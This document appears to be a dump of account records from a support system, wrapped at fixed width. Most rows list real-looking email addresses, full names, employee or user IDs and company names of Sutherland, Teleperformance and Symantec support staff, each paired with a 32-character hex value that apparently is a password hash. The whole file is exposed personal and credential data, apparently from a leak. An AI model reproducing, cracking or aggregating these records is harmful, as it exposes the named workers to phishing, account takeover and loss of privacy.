a78f-44bd-b9bc-886b1f5ed4a1,CRQ000000400346-CLNP-10/11/2011,000-0000,andrea.moni
ca.sabia@teleperformance.com.ar,Teleperformance,35889f979e8b3654cc7af2f57456236c
,Sabia,<blank>,122319,Andrea Monica,NULL,NULL,NULL
d50-47b3-a363-1867911dad9d,<blank>,<blank>,GanapathiSubramanian_S@SUTH.COM,Suthe
rland,26aa440ef5d6bac3d5413bcba7ce3695,S,<blank>,GanapathiSubramanian_S,Ganapath
i Subramanian,NULL,NULL,NULL
aa12-41d1-8f5a-4f5d298a85a8,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
716132,30b49c2df183d6d908a7383037f6da5d,Caragao,<blank>,227438,Kristine ,NULL,NU
LL,NULL
3c8-4d8b-bc97-8b9f6792694c,<blank>,<blank>,Girish_Surendran@SUTH.COM,Sutherland,
52de8bf6c9c6ff3557780f1e8d913efa,Surendran,<blank>,Girish_Surendran,Girish,NULL,
NULL,NULL
841-4f74-a9ba-d7f646b161c9,<blank>,<blank>,Gladys_Moscare@SUTH.COM,Sutherland,b9
b59c8b8d78296852c1a89651b3a001,Moscare,<blank>,Gladys_Moscare,Gladys,NULL,NULL,N
ULL
0d8-46ab-91a0-87ffc8870350,<blank>,<blank>,Glany_Pais@SUTH.COM,Sutherland,cee2e4
e6e85427ad0e8b975661282ba3,Pais,<blank>,Glany_Pais,Glany,NULL,NULL,NULL
0f07-4ccb-aefa-1ec654acdc98,CRQ000000241079,<blank>,Shibanarayan_Samanta@symante
c.com,KSC-04/15/2011,e1f9c640d3aecf01f357014cf9bc47ee,Samanta,<blank>,114417,Shi
banarayan,NULL,NULL,NULL
2c0-477f-8a24-3d9d60eb41ee,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,2d971748b7fe70629353e3ffd23b3068,OrtizRoyo,<blank>,GoergeMorgan_Royo,GoergeMorg
an,NULL,NULL,NULL
eea0-4f4f-9de4-569af0ed61f2,CRQ000000241079,<blank>,Ravi_Sharma1@symantec.com,ks
c-04/15/2011,03af724ab455a56cf6030036f9efb763,sharma1,<blank>,114495,Ravi,NULL,N
ULL,NULL
df7-41a5-a73e-cdb702e37fab,<blank>,<blank>,Helen_Abraham@SUTH.COM,Sutherland,731
77fe399537a4c7eb2e1dd8cf5c1ed,Abraham,<blank>,Helen_Abraham,Helen,NULL,NULL,NULL
99b1-441f-8900-f969b60c7302,CRQ000000603625--vmd--23/03/2012,<blank>,marvin_salo
nga@Suth.com,Sutherland,e9b44f7a3295089a4870b9686d6dcb39,Salonga,<blank>,222680,
Marvin,NULL,NULL,NULL
32a4-481b-a6e8-7cebcbc01640,"CRQ000000439556-RJ-Dec6, 2011",000-0000,rechelynano
ra_abenoj@SUTH.com,Sutherland,b701b63307d13d9c5199c7f9d357e0d1,Abenoja,<blank>,1
22776,Rechelyn Anora,NULL,NULL,NULL
95d0-4c13-b070-d75d50f88046,11/01/2010 - SPJ,EMPROV,accounts@symantec.teleperfo
rmance.gr,Teleperformance,a80d7c401afcb4a03de0cdb2b1d08aa4,Gazi,<blank>,067003,A
ikaterinh,NULL,NULL,NULL
09d0-4491-81c1-24de51902e29,CRQ000000601677--vmd--22/03/2012,<blank>,fatimaangel
ica_leyba@Suth.com,Sutherland,b66e9162edd57103ef037c84b741dd6e,Leyba,<blank>,222
626,Fatima Angelica,NULL,NULL,NULL
159-420e-bdd0-737dced58baf,<blank>,2614953,IvyDonna_Pondoc@SUTH.COM,Sutherland,e
a0d9df58bb25a169c9b4bd81ad0505c,PerezPondoc,<blank>,IvyDonna_Pondoc,IvyDonna,NUL
L,NULL,NULL
dbf-4614-87c5-717b67faf0a0,<blank>,<blank>,IvyJean_Micolob@SUTH.COM,Sutherland,4
6c54a013818469088a6ac45be29833d,JeanMicolob,<blank>,IvyJean_Micolob,Ivy,NULL,NUL
L,NULL
ba0-4648-972d-30fde6bc5fa7,<blank>,<blank>,IvyMae_DelaCerna@SUTH.COM,Sutherland,
ce5b115d920795222cca32ed351b4c12,DelaCerna,<blank>,IvyMae_DelaCerna,IvyMae,NULL,
NULL,NULL
ef2-4450-bdad-05286c05c038,<blank>,2614953,JacobJohnDalo_Elemento@SUTH.COM,Suthe
rland,c5467e60f61d846bb9a10400a165ca81,DalElemento,<blank>,JacobJohnDalo_Element
o,JacobJohn,NULL,NULL,NULL
d45-4c5a-8937-dec738d22ebd,<blank>,2632350,tools_id@symantec.suth.com,Sutherland
,c36e5a2fbbdef44d3239b462a3d2c250,A,<blank>,JadduaSolomon_A,Jaddua Solomon,NULL,
NULL,NULL
450-48bf-8b05-d24ae0b5cdc6,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,0c58692da468f25ea8cf947dd5a8fef8,M N,<blank>,Faruk_MN,Faruk,NULL,NULL,NULL
391-4f4a-8baa-972b18f98f6e,<blank>,<blank>,Fathim_Shukoor@SUTH.COM,Sutherland,30
858fc04f9a4271d4ee46c935966b26,Shukoor,<blank>,Fathim_Shukoor,Fathim,NULL,NULL,N
ULL
3b01-4a6c-9782-27f535bc40ee,CRQ000000641934--vmd--27/04/2012,000-000,nareshrao_i
ndugu@suth.com,sutherland,c81ec52129f0d86e6350c30a3db3a771,Indugu,<blank>,224255
,Naresh Rao,NULL,NULL,NULL
279-43fd-87a7-9da2ad0b0c7e,<blank>,<blank>,Ferdinand_Atienza@SUTH.COM,Sutherland
,69e1af8973262f4bc56499487e8dbaa8,Atienza,<blank>,Ferdinand_Atienza,Ferdinand,NU
LL,NULL,NULL
5344-40c3-8251-76327e0424fd,"CRQ000000682608 CLNP June 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,b88723bbc8dc9f06aed22482c586e38a,Deshpande,<b
lank>,226247,Vinayak,NULL,NULL,NULL
f51d-47c0-b2f7-b69060615ceb,<blank>,<blank>,Uma_Talwalkar@symantec.com,CRQ000000
643397 - SP - 27th April 2012,ac59abfebc1e7ff4753958dd85104763,Talwalkar,<blank>
,121637,Uma ,NULL,NULL,NULL
abac-42bd-9353-aa3496a5280d,<blank>,<blank>,daniel_matthews@symantec.com,Symante
c,e23fe1e1e74f9985074f546affeb17a3,Matthews,<blank>,daniel_matthews,Daniel,NULL,
NULL,NULL
0cb-439e-91ac-6029a2c2e7af,<blank>,86499,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",2c134407c0afd774ec84d134b31af6c1,T K,<blank>,reejith_tk,R
eejith,NULL,NULL,NULL
3cb7-4e1c-88af-c9bae8cdfa3b,"CRQ000000383422-RJ-Nov 1, 2011",000-0000,rajesh_rad
hakrishn2@SUTH.COM,Sutherland,c6682ff4aa3e34b6baf62ce7ad5e120f,Radhakrishnan,<bl
ank>,121846,Rajesh,NULL,NULL,NULL
596b-4bd1-b727-f171aaa8757c,<blank>,<blank>,stanley_lawrans@symantec.com,CRQ0000
00692554 - PR - 12th June 2012,ee9e0a6559804b8235a79f4997ad70b0,Gancia,<blank>,
226642,Mikkon ,NULL,NULL,NULL
8b1-466d-8682-6b71031be2dd,<blank>,2630245,JamieRJ_Stillert@suth.com,Sutherland,
70e802e9f8089f55aefa5cd41e6d18b8,Stillert,<blank>,JamieRJ_Stillert,Jamie R J,NUL
L,NULL,NULL
8d31-4c92-9b3f-5eed1db174b5,<blank>,<blank>,Rupertkimple_Manota@SPI.COM,PM - 6/1
4/2012 -,f22d6acc79803c0545a155c8c2741cbf,Manota,<blank>,226706,Rupert Kimple,NU
LL,NULL,NULL
a62-4fb1-b65e-b9c98e5033ee,<blank>,076283,Tools_id@symantec.suth.com,Sutherland,
1623246d32e961d743a567d36365ce8b,R Woodruff,<blank>,Jason_Woodruff,Jason,NULL,NU
LL,NULL
b145-4775-9d56-56b312817c5a,<blank>,INC213479,tools_id@symantec.suth.com,Sutherl
and,37df0ec1bca0a7d19ad74ef3dac4f48c,Amit Bathija,<blank>,075812,Narendra,NULL,N
ULL,NULL
2af-42b4-99c0-e34ac851a6a9,<blank>,<blank>,JawadAhamedBaig_MDN@SUTH.COM,Sutherla
nd,2756ad141eb9e4c0668235cc99b78142,MD N,<blank>,JawadAhamedBaig_MDN,Jawad Ahame
d Baig,NULL,NULL,NULL
1a00-4a16-982c-f2ffad8be74b,<blank>,<blank>,Jocelyn_Mariano@SPI.COM,PM - 6/14/20
12 - CRQ000000694461,1d8b592083e580f085faec57a9ee25d7,Mariano,<blank>,226707,Joc
elyn,NULL,NULL,NULL
56c-4a5e-ac81-7c81a9fa036c,<blank>,2626962,tools_id@symantec.suth.com,Sutherland
,2d517be6917510b34aa6879ca387889c,J,<blank>,JayanthMiranda_J,Jayanth Miranda,NUL
L,NULL,NULL
8f2b-4a18-8a54-b41a279b0dac,CRQ000000315440--VMD--8/8/2011,000-000,tools_id@syma
ntec.suth.com,Sutherland,210692255f6de977680530406544d5f1,M,<blank>,119297,Yokee
swaran,NULL,NULL,NULL
4a64-47f0-a52e-75f97d481683,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,602439029f733b9a1af86bf8b8da1531,O'Neil,<blank>,085720,Patrick,NULL,NULL,NULL
015-497f-b1fc-bcb3fe7afa7b,<blank>,<blank>,Jeff_Linnen2@SUTH.COM,Sutherland,85f3
f38eb817f78cfbdb0ccdaef127b7,Linnen,<blank>,Jeff_Linnen2,Jeffrey,NULL,NULL,NULL
988-4c5a-9415-93d830e331dc,<blank>,<blank>,Jeffrey_Pineda@symantec.suth.com,Suth
erland,73a5858492eb178e14a631c389c90e2d,Pineda,<blank>,Jeffrey_Pineda,Jeffrey,NU
LL,NULL,NULL
71e8-4e9f-b05b-53dba8c1819a,<blank>,<blank>,Maryjane_Delapaz@SPI.COM,PM - 6/14/2
012 - CRQ000000694513,8d387f0a84a7669105654d5c2b890a28,Dela Paz,<blank>,226723,
Mary Jane,NULL,NULL,NULL
5bf-489c-a9f2-41d10e35b86a,<blank>,<blank>,JennieAnne_Prieto@SUTH.COM,Sutherland
,4a096dae5f4098f064bc6dccc326667c,AnnePrieto,<blank>,JennieAnne_Prieto,Jennie,NU
LL,NULL,NULL
ab0-445f-a00a-aa11faeff472,<blank>,<blank>,0@Suth.com,Sutherland,1be0a05d8e3a376
2c7ffcd0e64e8904f,Dyck,<blank>,Jennifer_Dyck,Jennifer,NULL,NULL,NULL
0fa-43d7-9608-fcc79a31e5de,<blank>,<blank>,Jenny_Thomas@SUTH.COM,Sutherland,9c16
5e7357ce159c9ae94b138857f75c,Thomas,<blank>,Jenny_Thomas,Jenny,NULL,NULL,NULL
781-46ff-a38b-1f9a2e3f2fd2,<blank>,<blank>,JeraldSanthosh_Y@SUTH.COM,Sutherland,
ed0af622c13312a9a5814440ee5d31da,Y,<blank>,JeraldSanthosh_Y,Jerald Santhosh,NULL
,NULL,NULL
f17d-4a68-9601-ef3feb49d31f,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,b21aa9c22d5c298d77f30482f2e76a09,Youssef,<blank>,083141,John,NULL,NULL,NULL
f65-4665-9ab6-26e64ca7a34a,<blank>,<blank>,Ginu_George@SUTH.COM,Sutherland,1f925
aeb0cb5179444418113d5119ff7,George,<blank>,Ginu_George,Ginu,NULL,NULL,NULL
feee-410b-b00d-e688be2f200c,"CRQ000000682602 CLNP June 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,3200a671bbe60afdbcfb473ffb15ceae,Ashraf,<blan
k>,226244,Zaneed,NULL,NULL,NULL
f0a-4b3e-ba89-9e22aa268318,<blank>,<blank>,Howard_Vezina@symantec.suth.com,Suthe
rland,8e2fd494030fa0ce1a82e6b0d4a30e48,Vezina,<blank>,Howard_Vezina,Howard,NULL,
NULL,NULL
362f-4653-ba4d-72a5473b1f7b,<blank>,<blank>,brian_lund@teleperformance.com,CT -
08/06/2012 - CRQ000000687730,5dc40068eae01d64092b94d87177bc0b,Lund,<blank>,22646
2,Brian,NULL,NULL,NULL
8934-483a-98ad-21dca2ca2404,<blank>,<blank>,poornima_aduru@symantec.com,<blank>,
10b455e7410e70b03c61cf76c7698fd8,Aduru,<blank>,poornima_aduru,Poornima,NULL,NULL
,NULL
b7b-4272-b79b-c103fce94a8f,<blank>,<blank>,Jerold_Peter@Suth.com,Sutherland,01fc
3294eb00e8ca7e43e13361b9d4c8,Peter,<blank>,Jerold_Peter,Jerold,NULL,NULL,NULL
5fb5-4ac1-98ef-3eb48fc59aa4,<blank>,<blank>,anston_luiz@symantec.com,CRQ00000038
8222 - PR - 3rd Nov 2011,d7dbc6b9b0c53d94666f258a4569201e,Luiz,<blank>,122188,An
ston,NULL,NULL,NULL
500-4e5c-a122-96f3bfaca2aa,<blank>,<blank>,Jhetlhynne_Lleve@SUTH.COM,Sutherland,
a03c5df5e2791392bdb124b5a191714e,Lleve,<blank>,Jhetlhynne_Lleve,Jhetlhynne,NULL,
NULL,NULL
f46-44df-a7ce-74719b9e3b5f,<blank>,<blank>,v-6jike@mssuport.microsoft.com,Suther
land,90eeb9e9c6146c56245667a63606abf7,EP Keough,<blank>,Jillian_Keough,Jillian,N
ULL,NULL,NULL
25b5-4c60-acba-e9e1764c03cf,INC213497,nam 07/16/2010,tools_id@symantec.suth.com,
Sutherland,2855e4b487374cb2d641e183e5b3c62c,John,<blank>,075734,Ruban,NULL,NULL,
NULL
289c-4fef-a144-be9834aa3d62,sms 20.09.10,<blank>,accounts@symantec.teleperforman
ce.gr,Teleperformance,d543ef024d3a1b53078d8dd676211287,Koulouri,<blank>,109061,A
rchodoula,NULL,NULL,NULL
492b-4adc-a069-92116a516061,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,2fc3fe5df64ee12e1cc52e93fd749f87,Dmytrow,<blank>,083110,Nadia,NULL,NULL,NULL
b5b-48b4-b0b7-c55d4cfe6669,<blank>,<blank>,Jithin_TV@SUTH.COM,Sutherland,bc819e3
50050a8b466f496181b9fbd2d,T V,<blank>,Jithin_TV,Jithin,NULL,NULL,NULL
3e3-45c6-a43e-3820efe39ae1,<blank>,<blank>,Joan_Aldea@SUTH.COM,Sutherland,e58529
e48713469f9aef2f829534faa7,Aldea,<blank>,Joan_Aldea,Joan,NULL,NULL,NULL
c928-4176-822c-ad22be81d117,<blank>,<blank>,ajina_s@symantec.com,CRQ000000388225
- PR - 3rd Nov 2011,6f05398f4bb051a3e93ea3685964506d,S,<blank>,122189,Ajina ,NU
LL,NULL,NULL
b59-44d8-856f-17c9e621affc,<blank>,<blank>,JohnEdgar_Martillan@SUTH.COM,Sutherla
nd,fc84f3d430e89185269d4c823b4ea58c,EdgarMartillan,<blank>,JohnEdgar_Martillan,J
ohn,NULL,NULL,NULL
601f-43c9-811a-9207d4f6aadc,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,6a122cc0ddfa1e6675ed50b2216f0a60,Flores,<blank>,083115,Rene,NULL,NULL,NULL
8d56-496c-84b5-071ecf7ca9eb,CRQ000000439619-CLNP Dec 06 2011,000-0000,tools_id@s
ymantec.suth.com,Sutherland,f79b778cd14ff959ad437da48c8eba55,Condez,<blank>,1227
96,Leizel Pana,NULL,NULL,NULL
770-4a5b-916b-242962e6b489,<blank>,<blank>,JohnLeo_P@SUTH.COM,Sutherland,b6adb92
913cb506f571fd753276e8cf3,Paul Pandian,<blank>,JohnLeo_P,John Leo,NULL,NULL,NULL
c245-4d7e-8747-07046c4dc300,<blank>,<blank>,ioanna_dimou@teleperformance.com,CT
- 08/06/2012 - CRQ000000687730,82ecb3af925a7f15f5a3681743fdac91,Dimou,<blank>,22
6467,Ioanna,NULL,NULL,NULL
d5a9-4d8d-9814-95ea2e2bbd47,<blank>,<blank>,susanna_mahera@teleperformance.com,C
T - 08/06/2012 - CRQ000000687730,308ed35c7d708bd05469abe9c991acb3,Mahera,<blank>
,226468,Susanna,NULL,NULL,NULL
b11b-4190-a07c-2e689158ad41,<blank>,<blank>,Aiza_Pring@SPI.COM,PM - 6/14/2012 -
CRQ000000694481,be2fafacb4f3400a1c28adc28ef2a888,Pring Olivo,<blank>,226712,Aiza
,NULL,NULL,NULL
b39-42cc-acf0-debbf1fcd8d1,<blank>,<blank>,Josenita_Wingco@symantec.suth.com,Sut
herland,eaa6cb6fa65db8058093f0a98f4aedda,Wingco,<blank>,Josenita_Wingco,Josenita
,NULL,NULL,NULL
d91-433c-bd06-f9a3e6cebf72,<blank>,<blank>,Joseph_Medina@symantec.suth.com,Suthe
rland,a1b0fc79b32c17eaed436fb3602e3566,Medina,<blank>,Joseph_Medina,Joseph,NULL,
NULL,NULL
67a6-4415-b894-22fc06ad1081,CRQ000000734345--vmd--17/07/2012,<blank>,tools_id@sy
mantec.suth.com,sutherland,8691eb91ba404f8863e7d0730b2059f3,Ratannavar,<blank>,2
27956,Abhirajsingh,NULL,NULL,NULL
0fe-4a37-9570-c5b7d1a02861,<blank>,<blank>,JoseRajesh_D@SUTH.COM,Sutherland,795d
ff64f352e09d2a474ffdbb503c96,Dhanasekaran,<blank>,JoseRajesh_D,Jose Rajesh,NULL,
NULL,NULL
df09-427f-8059-84c1dd39ced4,19/04/2010 - SPJ,INC000000155088,nh.symantec@teleper
formance.com.ar,Teleperformance,9066a27f1b2e0cf9b08975190ff9f37a,Carnevali,<blan
k>,101617,Daniel,NULL,NULL,NULL
ab0-44ca-81c3-1487e68dec4d,<blank>,<blank>,JoyAnn_Damplona@SUTH.COM,Sutherland,9
f93a527fc4ecce240e657eb57102b93,AnnDamplona,<blank>,JoyAnn_Damplona,Joy,NULL,NUL
L,NULL
abb7-422c-8bfe-dc92185d34f1,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,ea99b29b997415d33263cf64967b9b74,Fernandes,<blank>,076002,Stanford,NULL,N
ULL,NULL
6175-4b0f-ba11-2c8d8f36f0a9,CRQ000000206817-VMD-23/02/2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,1f1ff793e884912dda0127f0d304bb46,K,<blank>,113290,Phil
ip,NULL,NULL,NULL
5a64-4600-8ff6-11281b7ef017,13/05/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.Com,S
utherland,497d3d139c32029540905cb34c752f7b,Thirunahari,<blank>,105268,Vinaykumar
,NULL,NULL,NULL
e500-4ee4-92ca-52a752b41b11,CRQ000000439477-CLNP Dec 06 2011,000-0000,tools_id@s
ymantec.suth.com,Sutherland,057167eaa7511d6bd0fac036eb8ee29c,Lacaba,<blank>,1228
12,Liezel Subang,NULL,NULL,NULL
12e-425e-82a2-8964727d751e,<blank>,<blank>,HemanRaj_V@SUTH.COM,Sutherland,1a9f90
13bc23e18a3014d2267ac363af,V,<blank>,HemanRaj_V,Heman Raj,NULL,NULL,NULL
9b7-4fd9-b1b7-405477b439c1,<blank>,<blank>,HennaLou_Marasigan@SUTH.COM,Sutherlan
d,418ac0a79a55252ffe0136b3454c63af,LouMarasigan,<blank>,HennaLou_Marasigan,Henna
,NULL,NULL,NULL
2cb1-4561-ad53-cd75ce8fb99e,<blank>,SH 17/11/2010,tools_id@symantec.suth.com,<bl
ank>,dabb01a65f5f9a0c2aae8a5516b98751,Xavier,<blank>,109855,Joan,NULL,NULL,NULL
c7f-4ca4-ad1d-8e22564d1b3d,<blank>,<blank>,Hermyl_Segovia@SUTH.COM,Sutherland,49
09d161be33da8c2219611a85cb3cfd,Segovia,<blank>,Hermyl_Segovia,Hermyl,NULL,NULL,N
ULL
79e-4ac0-97a3-7efa16e3bf4f,<blank>,<blank>,Hetal_Desai@SUTH.COM,Sutherland,c1a3f
43f5dc2ec43c18938090a6bbfb2,Desai,<blank>,Hetal_Desai,Hetal,NULL,NULL,NULL
ef4-4cf7-8b17-1dabc388049c,<blank>,<blank>,HilaryIvan_Ricardo@Suth.com,Sutherlan
d,67db131e31158f6ca120c779f524b420,IvanRicardo,<blank>,HilaryIvan_Ricardo,Hilary
,NULL,NULL,NULL
1f5-492a-9dbe-f2307e259025,<blank>,<blank>,Hitendra_Patel1@SUTH.COM,Sutherland,c
34f0b35888df20b86b7680c4015894e,Patel,<blank>,Hitendra_Patel1,Hitendra,NULL,NULL
,NULL
80de-47a2-89fc-6d86666451f8,<blank>,<blank>,stanley_lawrans@symantec.com,CRQ0000
00692581 - PR - 12th June 2012,30c03d23cb74774b41b59289adb1959c,Escano,<blank>,
226655,Timothy ,NULL,NULL,NULL
1a7-42e8-8f71-54a45767f50b,<blank>,<blank>,Howard_Bernardo@SUTH.COM,Sutherland,7
87a295d0df9d08b4f5ddda96758b1cd,Bernardo,<blank>,Howard_Bernardo,Howard,NULL,NUL
L,NULL
88e3-4a52-81a3-9484cec1edd3,CRQ000000241079 PBP 15/04/2011,<blank>,Chaintanya_Ku
mar@symantec.com,Symantec,c1fd5433e58e612cb3ccfb22d37281b8,Kumar,<blank>,114471,
Chaintanya,NULL,NULL,NULL
79ab-4970-a3d9-4d8651bde151,30/12/2009 - SPJ,EMPROV,accounts@symantec.teleperfor
mance.gr,Teleperformance,eb50e7211e39d9b62a3456db6105aa1b,Vaury,<blank>,097985,V
incent,NULL,NULL,NULL
1c5-4453-91c8-a9aa59424748,<blank>,EMPROV,symaccount@ipcdoctor.co.kr,ipcdoctor,7
63e82c5b2c53d20c5cd38349c788c3f,Sakai,<blank>,088836,Yumiko,NULL,NULL,NULL
209f-412f-8df5-a8fe093cc6f6,<blank>,SH 17/11/2010,tools_id@symantec.suth.com,<bl
ank>,ee3a7bfe0bfe818487b0cdec4debaab4,Varadharajan,<blank>,109856,Venkateswaran,
NULL,NULL,NULL
ef0-4f2f-9f37-240527e6326f,<blank>,<blank>,JamesL_OHara@SUTH.COM,Sutherland,01fa
75e5df404b48e98c21a67faf16cf,Hara,<blank>,JamesL_OHara,James L O,NULL,NULL,NULL
967-4195-a20e-d352d17d00a0,<blank>,<blank>,JamesPravin_E2@SUTH.COM,Sutherland,ff
facc1ed670afedb86ac7072f1811ad,E,<blank>,JamesPravin_E2,James Pravin,NULL,NULL,N
ULL
da2-438e-a383-d3dabdb16c23,<blank>,<blank>,v-6jgood@mssupport.microsoft.com,Suth
erland,a9f131a0f7b4774b423db78388b8311d,R Goodwill,<blank>,Jamie_Goodwill,Jamie,
NULL,NULL,NULL
90f-4508-bfeb-0a1a7f450d63,<blank>,<blank>,Jandie_Cadigal@SUTH.COM,Sutherland,0c
178b0c2a4dded7c6ff3b1cea52f6ac,Cadigal,<blank>,Jandie_Cadigal,Jandie,NULL,NULL,N
ULL
1da-48ea-9dd8-7ae17b971900,<blank>,<blank>,JanenaJane_Mohammad@SUTH.COM,Sutherla
nd,25913db25c5998c089e7ea99d725902c,JaneMohammad,<blank>,JanenaJane_Mohammad,Jan
ena,NULL,NULL,NULL
14c3-409a-8532-85ebe2b3d191,<blank>,SH 17/11/2010,tools_id@symantec.suth.com,<bl
ank>,b1856a53de04329984df5d5154f5775a,Wright,<blank>,109857,Christopher,NULL,NUL
L,NULL
ce2-47c9-8360-f21097360627,<blank>,<blank>,JasperKrestianne_Labitad@SUTH.COM,Sut
herland,2e06cb1e2215b25a6b28ee40d49b21c8,KrestianneLabitad,<blank>,JasperKrestia
nne_Labitad,Jasper,NULL,NULL,NULL
144-467c-9896-f948bf28f5d6,<blank>,<blank>,JavidAkthar_S@SUTH.COM,Sutherland,2ff
1018ac3251c04721d3bf319fda2dc,S,<blank>,JavidAkthar_S,Javid Akthar,NULL,NULL,NUL
L
326-4f04-b9fe-5f740486766b,<blank>,<blank>,Jayalakshmi_J2@SUTH.COM,Sutherland,0a
8f28964021034ebeb36b338b3d4df6,J,<blank>,Jayalakshmi_J2,Jayalakshmi,NULL,NULL,NU
LL
277-4b8f-a098-1900c5b96eb6,<blank>,<blank>,JayAnthony_Magpali@SUTH.COM,Sutherlan
d,681bff7ab3aab6cc9246eef6746c97cd,AnthonyMagpali,<blank>,JayAnthony_Magpali,Jay
,NULL,NULL,NULL
f2d-4bb1-8a12-8d8388acd11a,<blank>,<blank>,Saju_Ulahannan@SUTH.COM,Sutherland,6b
83f7ca6eb42695a9457ebd7099e46c,Anakuzhiyil,<blank>,Saju_Anakuzhiyil_Ulahannan,Sa
ju,NULL,NULL,NULL
cd0-4a38-973f-02724689175c,<blank>,<blank>,Sakib_Munir@SUTH.COM,Sutherland,25f36
8bd3c7a842a862e0898d456a7ed,Munir,<blank>,Sakib_Munir_Maktabay,Sakib,NULL,NULL,N
ULL
c7a-44ef-b6dd-26c5375575fb,<blank>,<blank>,Samatha_B@SUTH.COM,Sutherland,a1434bf
9c49028cfe9fd70638285bb42,B,<blank>,Samatha_B,Samatha,NULL,NULL,NULL
dbc-4d00-8946-7c8215ff8d43,<blank>,<blank>,Saritha_Santhosh@SUTH.COM,Sutherland,
a12623707ea340b99ab141b81b6f5abb,Santhosh,<blank>,Saritha_Santhosh,Saritha,NULL,
NULL,NULL
cde-448d-be82-ffd7c3ee2ce0,<blank>,<blank>,Sarojini_Ganapathy@suth.com,Sutherlan
d,415798232bf18ec8ee9c87e657264359,Ganapathy,<blank>,Sarojini_Ganapathy,Sarojini
,NULL,NULL,NULL
586-4748-b366-4ca571376925,<blank>,<blank>,SarveshBabu_S@SUTH.COM,Sutherland,12c
ac83fef6b619afe99b9ab2b789bee,Babu,<blank>,Sarvesh_Babu_S,Sarvesh,NULL,NULL,NULL
690-44e4-8e4d-67aed18e5688,<blank>,<blank>,Sashirekha_Sambasivam@SUTH.COM,Suther
land,81fc3a7807a84910108b95cd2cd9a7fa,Sambasivam,<blank>,Sashirekha_Sambasivam,S
ashirekha,NULL,NULL,NULL
c49-4163-8e73-76fb8dc5859c,<blank>,<blank>,ASasi@suth.com,Sutherland,dc0250b34bc
7e04cfb68878000a94c61,Vadhana,<blank>,Sasi_Vadhana_Arumugam,Sasi,NULL,NULL,NULL
03f-46f4-9333-f409f8f46680,<blank>,<blank>,SathiKumar_K@SUTH.COM,Sutherland,3ebc
b146f143dc6bc305f89408993763,Kumar,<blank>,Sathi_Kumar_K,Sathi,NULL,NULL,NULL
b02-4238-a84e-60b233665ed7,<blank>,<blank>,sathish_g2@suth.com,Sutherland,7ea6a2
e69e41d04a4e44cf5e654749b1,Ganjendiran,<blank>,Sathish_Ganjendiran,Sathish,NULL,
NULL,NULL
be7-4b96-bad8-414d15c369b0,<blank>,<blank>,SathishKamal_BS@SUTH.COM,Sutherland,d
00500735ab22262ab5c6d74e083ed44,Kamal,<blank>,Sathish_Kamal_B_S,Sathish,NULL,NUL
L,NULL
88d-410d-bc6c-3abdf71a0368,<blank>,<blank>,SathishKumar_B2@SUTH.COM,Sutherland,4
6a4c740fe565ccc4df010b2bc16d076,Kumar,<blank>,Sathish_Kumar_B,Sathish,NULL,NULL,
NULL
d2f-460e-bd01-88bdbbf15ce5,<blank>,<blank>,SathishKumar_J2@SUTH.COM,Sutherland,4
4762e0cae459d61384dfa9b1271498b,Kumar,<blank>,Sathish_Kumar_J,Sathish,NULL,NULL,
NULL
51a-4546-a0a4-162a6193fb87,<blank>,<blank>,Saurabh_Desai@SUTH.COM,Sutherland,8b4
ab05f352e3a4aa266810cdcaa91ac,Ashok,<blank>,Saurabh_Ashok_Desai,Saurabh,NULL,NUL
L,NULL
c5c-45ec-acee-9810a7a668ec,<blank>,<blank>,Saurabh_Hirlekar@SUTH.COM,Sutherland,
21fe3931ccb4071f9586054b09bdfb3f,Ganesh,<blank>,Saurabh_Ganesh_Hirlekar,Saurabh,
NULL,NULL,NULL
360-45b9-a936-a5b314501ea4,<blank>,<blank>,Saurabh_Ranadive@SUTH.COM,Sutherland,
08e61d7f111f5a2c08c81ff8ddead5d1,Sandip,<blank>,Saurabh_Sandip_Ranadive,Saurabh,
NULL,NULL,NULL
037-4979-8a5f-64978daf3188,<blank>,<blank>,Saurabh_Sumit@suth.com,Sutherland,da3
cb81e0aa1030b7e10279b0341ef59,Sumit,<blank>,Saurabh_Sumit,Saurabh,NULL,NULL,NULL
c7e-487d-9eb3-f2f53cc859a8,<blank>,<blank>,Savio_Dcosta@SUTH.COM,Sutherland,bfa6
3ae1d27095b576a5ae09d0b77dff,John,<blank>,Savio_John_Dcosta,Savio,NULL,NULL,NULL
094-4b16-abae-bdf6ed0e1037,<blank>,2633282,tools_id@symantec.suth.com,Sutherland
,3bf78e4d37faf4c7575c9f85987c9897,Shaikh,<blank>,Sarfaraz_Shaikh_Salim,Sarfaraz,
NULL,NULL,NULL
c26-453f-82de-59612b3f00ec,<blank>,<blank>,SathishKumar_K2@SUTH.COM,Sutherland,5
b5f7079ab25f86f9663971f23ecb98e,Kumar,<blank>,Sathish_Kumar_K,Sathish,NULL,NULL,
NULL
e03e-43c7-807b-9d555c682aa7,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,4812d062a5f228fc68dfc888e193578b,PK,<blank>,naseer_pk_cc,Naseer,NULL,NULL
,NULL
dca4-44e9-8889-16a09b9fc1ce,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,1eae1ea7851a20df92274af5abbb6d2c,J,<blank>,arjun_j_cc,Arjun,NULL,NULL,NUL
L
064e-4666-86a0-d0098894af9f,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,1a02bd805f2764f68072c164418057f5,L,<blank>,dinesh_l_cc,Dinesh ,NULL,NULL,
NULL
280-4a11-aaa6-1a28c51bbe78,<blank>,<blank>,SathyaPrasad_C@SUTH.COM,Sutherland,a1
668723b0fbe26ff47a7416fbde8d15,Prasad,<blank>,Sathya_Prasad_C,Sathya,NULL,NULL,N
ULL
430-4453-bb4f-24e704b93bbf,<blank>,<blank>,SatishKumar_V@SUTH.COM,Sutherland,86b
3d3450be09c7ed57b94323d8c1841,Kumar,<blank>,Satish_Kumar_V,Satish,NULL,NULL,NULL
